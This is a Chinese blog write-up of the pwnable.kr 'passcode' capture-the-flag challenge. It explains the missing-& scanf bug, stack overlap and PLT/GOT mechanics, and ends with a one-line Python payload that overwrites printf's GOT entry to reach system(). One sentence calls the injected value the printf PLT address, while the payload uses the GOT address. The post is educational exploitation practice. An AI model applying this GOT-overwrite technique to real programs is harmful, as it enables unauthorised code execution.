pwnable.rk [Toddler‘s Bottle]  5、passcode 详细过程

最新推荐文章于 2021-08-05 22:45:43 发布
最新推荐文章于 2021-08-05 22:45:43 发布
阅读量209 收藏
点赞数
分类专栏: 网安 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kirito_pio/article/details/112462818
版权

 

  最近在学习pwn,做到这个题搜了一些资料,弄了挺长时间,记录一下。
 

passcode.c代码如下:

#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);//----------------------------------------没有&符号
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);//------------------------------------没有&符号

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}

查看代码,错误的地方在于使用scanf的时候没有加&,这样做导致变量passcode1,passcode2成为类似指针的变量。

比如下面两种合法的赋值。与下面的代码进行类比,变量passcode1,passcode2就像下面的p指针,可以直接修改变量passcode1,passcode2所指向地址的值。假设passcode1的值为0x61616161,在scanf输入一个数(假设为10),结果就是把地址为0x61616161的数据修改为10.个人认为这里是理解整个做法的关键,之前看的好多分析都没有突出这一点,可能认为太简单了吧 :( 所以在介绍方法之前把这个先说一下,后面就按部就班的做了。

#include <stdio.h>
int main()
{
	int a;
	int *p = &a;
	scanf("%d", p);//指针的赋值
	scanf("%d", &a);//整型的赋值
	printf("%d", a);
	return 0;
}

 

因为那个网站太慢了,调试的体验也不好,可以先拷到本地进行调试。

scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。-p:保留原文件的修改时间,访问时间和访问权限。命令如下:

scp -P 2222 passcode@pwnable.kr:/home/passcode/* ./

先查看passcode的保护机制,在栈上使用了 Canary ,可以缓解栈溢出(如果没有栈溢出的保护的话可以像之前的题直接找到变量的位置,把数据写到栈里面)。

checksec passcode

 

 

下面对程序进行调试、反汇编(gdb passcode)

先看函数login(disassemble login),主要获取到的信息只要有三个,一个是数据的地址(passcode1的地址是[ebp-0x10],passcode2的地址是[ebp-0xc]);第二个信息是很多函数都有@plt的标志,可以使用GOT表的覆写来完成这个题目;第三个信息是想办法执行到或者直接跳转到system函数这里(地址0x080485ea)就可以获取到想要的flag了。

大致介绍一下plt表和got表(我自己的理解),了解的可以直接跳过。系统在调用函数的时候会为每个函数分配对应的空间,但是为了节约空间,对经常调用的函数(系统提供的函数,如printf、scanf、fflush等等)进行链接,就分配一份空间就可以了,每次调用这个函数都直接跳到那个地址。可以看上面的截图,在+14、+60都调用了printf,它们都call了相同的地址0x8048420.这个位置就是plt表的位置,而plt表会继续跳转到got表的位置。即调用printf函数----->跳转到plt表------>跳转到got表,最后由got表对printf函数进行具体的执行。如下图所示,0x804a000 <printf@got.plt>就是got表的地址。

 

所以获取flag的大致思路就有了:如下图所示,第一行是正常的执行过程,由于got表的地址是可以获取的,所以要构造一个指针指向plt表跳转的地址即got表的地址,通过指针把got表的地址所指向的内容改为执行system()的地址,那么got表中所执行的内容就从执行printf变成执行system。执行顺序就从1->2->3变成1->2->3'。

 

 

在main函数中,welcome()与login(),并且两个函数都不含参数,所以ebp的值是相同的。之前得出passcode1的地址为ebp-0x10,passcode2的地址为ebp-0xc。在welcome()函数中还有一个name参数,去找它的地址。对welcome()进行反汇编(disassemble welcome),得到name的起始地址是0x70。

把它们换成十进制,并简单绘制一下栈的地址模型,注意只有ebp相同时才能把不同函数的内存写在一起。

大致上画了一下,因为有栈溢出的保护,所以在输入name的时候不能影响passcode2。

但是,name最后的四个字节与passcode1的开始4个字节是重合的,所以可以在name的最后4个字节中写入printf()的plt表的地址0x8048420,当login()调用scanf("%d", passcode1)函数时写入执行system()函数的地址0x080485e3

整个login()的执行顺序就变成了如下图所示的顺序,按顺序执行到scanf(passcode1)后的printf后,直接跳转到0x080485e3执行system().

在填充passcode1时记得使用小端序0x8048420-->\x00\xa0\x04\x08,在输入scanf是记得把0x080485e3转为十进制134514147

在本地进行测试,执行下面的命令,好像得到了啥不得了的东西 :)

python -c "print('b'*96 + '\x00\xa0\x04\x08'+'\n'+'134514147'+'\n')" | ./passcode

连接到给的链接,输入上面的命令,可以得到flag。

 

 

kirito_pio
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深度探索C++对象模型(22)——函数语义学(6)——成员函数指针和vcall
波波鱼的博客
02-03 593
1.指向成员函数的指针 成员函数地址,编译时就确定好的。但是,调用成员函数是需要通过对象来调用的; 所有常规(非静态)成员函数,要想调用,都需要一个对象来调用它; 所以对于使用成员函数指针调用普通成员函数,需要使用对象进行调用 代码: #include &lt;iostream&gt; using namespace std; namespace _nmsp1 //命名空间 { ...
Toddler Tap-开源
07-20
【 Toddler Tap 开源项目详解】 “Toddler Tap”是一个专为幼儿设计的开源软件,旨在激发孩子们对键盘和字母的初步认知。这个项目源于一个简单而温馨的观察:当小孩子们看到大人在电脑上敲击键盘时,他们通常会表现...
(C++对象模型):虚函数地址问题的vcall引入
baidu_41388533的博客
11-09 304
虚函数地址问题的vcall引入 class MYACLS { public: virtual void myvirfunc1() { } virtual void myvirfunc2() { } }; int main() { printf("MYACLS::myvirfunc1()地址=%p\n", &MYACLS::myvirfunc1); //打印的是vcall函数(代码)地址,而不是真正的虚函数; printf("MYACLS::myvirfunc2()地址=%
虚函数地址问题的vcall引入
昔拉的博客
04-25 249
// project100.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include "pch.h" #include <iostream> #include <time.h > #include <stdio.h> #include <vector> using namespace std; class...
c++成员函数指针揭秘
w_ww_w的专栏
09-02 843
1 前言C++语言支持指向成员函数的指针这一语言机制。就像许多其它C++语言机制一样,它也是一把双刃剑,用得好,能够提高程序的灵活性、可扩展性等等,但是也存在一些不易发现的陷阱,我们在使用它的时候需要格外注意, 尤其是在我们把它和c++其它的语言机制合起来使用的时候更是要倍加当心
A Toddler Game-开源
05-26
至于“Toddler-windows”这个文件,很可能是游戏的Windows版本安装包或者执行文件。这意味着开发者已经为Windows用户提供了一个方便的执行版本,无需在Windows环境中自行编译源代码,简化了用户的使用流程。 总的来...
Kids Key - Alphabet Training for Toddler-开源
04-28
此外,对于父母和教育工作者而言,开源软件也意味着透明度,他们可以清楚了解软件的工作原理,更好地监督孩子的学习过程。 "frmkidkey.frx"、"kidkey1.vbw"、"kidkey1.vbp" 和 "frmkidkey.frm" 这些文件名,揭示了...
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
在这个项目中,可能会有一个名为`toddler_care`的应用,包含了模型、视图、模板和静态文件。 3. **数据库模型**:在`models.py`文件中定义数据库模型,如`Nanny`(保姆)、`Product`(产品)和`Order`(订单)。...
02.专四2017年真题词汇讲义.pdf
10-05
to do sth."(强迫某人做某事)等,有助于考生在备考过程中提高词汇应用能力。 "victim"(牺牲品)一词,其搭配"fall victim of"(沦为...的牺牲品),也引出了"vict"系列词汇,如"victory"(胜利)和"conviction...
指向成员函数的指针及vcall进一步谈
昔拉的博客
04-26 244
#include "pch.h" #include <iostream> #include <vector> #include <ctime> using namespace std; namespace _nmsp1 //命名空间 { //一:指向成员函数的指针 //成员函数地址,编译时就确定好的。但是,调用成员函数,是需要通过对象来调用的; /...
C ++ 虚函数 (转)
自由的风
03-05 574
第一节、一道简单的虚函数的面试题 题目要求:写出下面程序的运行结果?       1、当上述程序中的函数p()不是虚函数,那么程序的运行结果是如何?即如下代码所示: class A { public: void p() {   cout } }; class B : public A { public: void p() {   cout } };
深度探索c++对象模型-25-指向成员函数的指针和vcall
FairLikeSnow的博客
08-05 150
一、指向成员函数的指针 class A { public: void myfunc1(int nTempValue) { cout << "nTempValue = " << nTempValue << endl; } void myfunc2(int nTempValue2) { cout << "nTempValue2 = " << nTempValue2 << endl; } }; void func
pwn的学习5 passcode
飞花的世界
12-30 803
第五题,passcode 还是3个文件,那就首先看C文件 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1);...
pwnable 笔记 Toddler's Bottle - passcode
HiTaQini
11-03 2912
这题涉及到GOT覆写技术,我更新了一篇讲GOT覆写的文章,以这道题做的例子,讲的比较详细,大家可以参考一下: http://blog.csdn.net/smalosnail/article/details/53247502
c++虚函数调用的两种方式
云哥的专栏
05-27 3470
#include using namespace std; class B { public:     virtual void fun(){cout }; int main() {     B b;          // 第一种方式(查表)     B* p = &b;     p->fun();     // 第二种方式(调整函数)     v
pwnable.kr】 passcode
think_ycx的专栏
07-09 532
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此会把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机会,可...
c ++虚函数_C ++中的虚函数
cunfen6312的博客
07-30 1568
c ++虚函数 C ++中的虚函数 (Virtual Functions in C++) Virtual Function is a function in base class, which is overrided in the derived class, and which tells the compiler to perform Late Binding on this functi...
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值